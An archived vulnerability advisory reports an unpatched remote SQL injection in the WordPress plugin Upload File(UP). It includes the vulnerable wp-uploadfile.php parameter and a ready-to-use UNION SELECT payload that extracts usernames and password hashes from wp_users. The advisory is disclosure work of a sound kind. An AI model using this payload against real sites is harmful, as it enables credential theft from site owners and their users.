TUCoPS :: Web :: Blogs :: bx3300.htm

vuln in WordPress plugin Upload File(UP)
vuln in WordPress plugin Upload File(UP)
vuln in WordPress plugin Upload File(UP)


New Advisory:=0D
Wordpress Plugin Upload File(UP) Remote SQL Injection=0D
=0D
=0D
--------------------Summary----------------=0D
Software: Upload File (WordPress Plugin)=0D
Critical Level: Moderate=0D
Type: SQL Injection=0D
Class: Remote=0D
Status: Unpatched=0D
PoC/Exploit: Not Available=0D
Solution: Not Available=0D
Discovered by: eserg.ru=0D
=0D
-----------------Description---------------=0D
1. SQL Injection.=0D
=0D
http://localhost/[path]/wp-uploadfile.php?f_id=[SQL]=0D 
SQL query:=0D
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*=0D
=0D
--------------PoC/Exploit----------------------=0D
Waiting for developer(s) reply.=0D
=0D
--------------Solution---------------------=0D
No Patch available.=0D
=0D
--------------Credit-----------------------=0D
Regards,=0D
Belsec Team=0D
http://eserg.ru

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH